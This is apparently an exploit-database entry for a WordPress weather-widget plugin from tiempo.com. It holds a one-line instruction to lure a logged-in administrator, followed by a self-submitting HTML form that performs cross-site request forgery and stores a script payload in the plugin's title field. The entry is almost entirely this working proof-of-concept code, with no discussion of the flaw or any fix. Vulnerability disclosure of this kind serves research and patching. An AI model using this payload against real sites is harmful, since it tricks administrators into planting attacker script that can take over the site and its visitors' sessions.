Share
## https://sploitus.com/exploit?id=WPEX-ID:0E677DF9-2C49-42F0-A8E2-DBCF85BFC1A2
Make a logged in admin open a page with the code below

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php&action=new" method="POST">
      <input type="hidden" name="page" value="tiempocom&#47;app&#47;admin&#46;php" />
      <input type="hidden" name="title" value="&lt;script&gt;alert&#40;/XSS/&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="language" value="en" />
      <input type="hidden" name="continent" value="8" />
      <input type="hidden" name="country" value="208" />
      <input type="hidden" name="location" value="12325" />
      <input type="hidden" name="location&#95;label" value="Base&#32;Amundsen&#45;Scott&#32;del&#32;Polo&#32;Sur" />
      <input type="hidden" name="location&#95;link" value="https&#58;&#47;&#47;www&#46;tiempo&#46;com&#47;base&#45;amundsen&#45;scott&#45;del&#45;polo&#45;sur&#46;htm" />
      <input type="hidden" name="province&#95;type" value="4" />
      <input type="hidden" name="time" value="5" />
      <input type="hidden" name="format" value="1" />
      <input type="hidden" name="temperature&#95;format" value="0" />
      <input type="hidden" name="wind&#95;format" value="0" />
      <input type="hidden" name="rain&#95;format" value="0" />
      <input type="hidden" name="style" value="1" />
      <input type="hidden" name="marquee" value="&#35;000000" />
      <input type="hidden" name="background" value="&#35;FFFFFF" />
      <input type="hidden" name="text" value="&#35;808080" />
      <input type="hidden" name="max" value="&#35;FF0000" />
      <input type="hidden" name="min" value="&#35;0000FF" />
      <input type="hidden" name="font" value="1" />
      <input type="hidden" name="save" value="Save" />
      <input type="hidden" name="action" value="&#45;1" />
      <input type="hidden" name="paged" value="1" />
      <input type="hidden" name="action2" value="&#45;1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>